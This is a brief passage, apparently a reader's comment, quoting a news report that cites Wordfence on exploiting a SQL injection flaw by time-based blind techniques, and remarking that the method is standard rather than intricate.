However, to exploit the flaw requires a “a time-based blind approach” on the part of attackers to extract database information, which is “an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities,” according to Wordfence.

I wouldn’t call that intricate. It’s pretty standard to try it since you get immidiate feedback that you can inject sql statements.